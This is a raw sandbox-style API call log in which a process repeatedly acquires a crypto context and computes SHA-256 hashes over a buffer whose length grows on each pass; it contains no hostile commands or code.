[0186.717] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.718] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.718] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x60, dwFlags=0x0) returned 1 [0186.718] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86760 [0186.718] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.718] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.718] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338233d0) returned 1 [0186.718] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.718] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0x80, dwFlags=0x0) returned 1 [0186.718] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86730 [0186.718] CryptDestroyHash (hHash=0x3396f200) returned 1 [0186.718] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0186.718] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.719] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.719] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0186.719] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86160 [0186.719] CryptDestroyHash (hHash=0x3396f660) returned 1 [0186.719] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.719] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.720] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.720] CryptHashData (hHash=0x3396f7b0, pbData=0x32348160, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0186.720] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86190 [0186.720] CryptDestroyHash (hHash=0x3396f7b0) returned 1 [0186.720] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.720] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0186.720] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.720] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0186.720] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86670 [0186.720] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.720] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0186.720] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0186.724] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.724] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.724] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86220 [0186.724] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0186.724] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0186.724] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338222d0) returned 1 [0186.725] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.725] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x120, dwFlags=0x0) returned 1 [0186.725] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86130 [0186.725] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.725] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0186.725] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338221d0) returned 1 [0186.725] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.725] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x140, dwFlags=0x0) returned 1 [0186.725] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86460 [0186.726] CryptDestroyHash (hHash=0x3396f890) returned 1 [0186.726] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0186.726] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.726] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.726] CryptHashData (hHash=0x3396f040, pbData=0x32348160, dwDataLen=0x160, dwFlags=0x0) returned 1 [0186.726] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86880 [0186.726] CryptDestroyHash (hHash=0x3396f040) returned 1 [0186.726] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.726] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821dd0) returned 1 [0186.727] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.727] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x180, dwFlags=0x0) returned 1 [0186.727] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85fe0 [0186.727] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0186.727] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0186.727] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822cd0) returned 1 [0186.727] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.728] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0186.728] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e864c0 [0186.728] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.728] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0186.728] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338238d0) returned 1 [0186.728] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.728] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0186.728] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86a60 [0186.728] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.728] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0186.728] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0186.729] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.729] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0186.729] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86940 [0186.729] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0186.729] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0186.729] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821ed0) returned 1 [0186.730] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.730] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0x200, dwFlags=0x0) returned 1 [0186.730] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e867c0 [0186.730] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0186.730] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0186.730] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338233d0) returned 1 [0186.741] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.741] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x220, dwFlags=0x0) returned 1 [0186.741] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e867f0 [0186.741] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0186.741] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0186.741] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821dd0) returned 1 [0186.741] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.741] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x240, dwFlags=0x0) returned 1 [0186.742] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85f50 [0186.742] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0186.742] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0186.742] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0186.742] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.742] CryptHashData (hHash=0x3396f510, pbData=0x32348160, dwDataLen=0x260, dwFlags=0x0) returned 1 [0186.742] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86970 [0186.742] CryptDestroyHash (hHash=0x3396f510) returned 1 [0186.742] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0186.743] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338223d0) returned 1 [0186.743] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.743] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x280, dwFlags=0x0) returned 1 [0186.743] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e865e0 [0186.743] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.743] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0186.743] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338235d0) returned 1 [0186.744] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.744] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0186.744] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e864f0 [0186.744] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.744] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0186.744] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0186.745] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.745] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0186.745] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86580 [0186.745] CryptDestroyHash (hHash=0x3396f900) returned 1 [0186.745] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0186.745] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338220d0) returned 1 [0186.746] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.746] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0186.746] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e866a0 [0186.746] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0186.746] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0186.746] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0186.749] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.749] CryptHashData (hHash=0x3396f270, pbData=0x32348160, dwDataLen=0x300, dwFlags=0x0) returned 1 [0186.749] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e868b0 [0186.749] CryptDestroyHash (hHash=0x3396f270) returned 1 [0186.749] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0186.749] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823bd0) returned 1 [0186.750] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.750] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x320, dwFlags=0x0) returned 1 [0186.750] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e868e0 [0186.750] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.750] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0186.750] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338220d0) returned 1 [0186.751] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.751] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x340, dwFlags=0x0) returned 1 [0186.751] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e863a0 [0186.751] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.751] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0186.751] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338220d0) returned 1 [0186.752] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.752] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x360, dwFlags=0x0) returned 1 [0186.752] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86520 [0186.752] CryptDestroyHash (hHash=0x3396f660) returned 1 [0186.752] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0186.752] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0186.753] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.753] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0x380, dwFlags=0x0) returned 1 [0186.753] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86550 [0186.753] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0186.753] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0186.753] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822fd0) returned 1 [0186.753] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.753] CryptHashData (hHash=0x3396ef60, pbData=0x32348160, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0186.753] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85ef0 [0186.754] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0186.754] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0186.754] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821ed0) returned 1 [0186.754] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.754] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0186.754] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86910 [0186.754] CryptDestroyHash (hHash=0x3396f890) returned 1 [0186.754] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0186.754] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.755] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.755] CryptHashData (hHash=0x3396f270, pbData=0x32348160, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0186.755] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86400 [0186.755] CryptDestroyHash (hHash=0x3396f270) returned 1 [0186.755] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.755] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.755] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.755] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x400, dwFlags=0x0) returned 1 [0186.755] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e862e0 [0186.755] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.755] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.755] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0186.756] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.756] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0x420, dwFlags=0x0) returned 1 [0186.756] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86250 [0186.756] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0186.756] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0186.756] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.757] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.757] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x440, dwFlags=0x0) returned 1 [0186.757] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e860a0 [0186.757] CryptDestroyHash (hHash=0x3396f660) returned 1 [0186.757] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.757] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.757] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.757] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x460, dwFlags=0x0) returned 1 [0186.757] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86a00 [0186.757] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.757] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.757] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0186.758] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.758] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0x480, dwFlags=0x0) returned 1 [0186.758] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86280 [0186.758] CryptDestroyHash (hHash=0x3396f200) returned 1 [0186.758] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0186.758] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338221d0) returned 1 [0186.759] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.759] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0186.759] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e865b0 [0186.759] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.759] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0186.759] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338227d0) returned 1 [0186.759] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.759] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0186.759] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86040 [0186.759] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.760] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0186.760] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821dd0) returned 1 [0186.760] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.760] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0186.760] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e869a0 [0186.760] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.760] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0186.760] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0186.761] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.761] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x500, dwFlags=0x0) returned 1 [0186.761] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e869d0 [0186.761] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.761] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0186.761] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821ed0) returned 1 [0186.761] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.761] CryptHashData (hHash=0x3396f040, pbData=0x32348160, dwDataLen=0x520, dwFlags=0x0) returned 1 [0186.762] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e86700 [0186.762] CryptDestroyHash (hHash=0x3396f040) returned 1 [0186.762] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0186.762] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821ed0) returned 1 [0186.765] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.765] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x540, dwFlags=0x0) returned 1 [0186.765] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e863d0 [0186.765] CryptDestroyHash (hHash=0x3396ebe0) returned 1 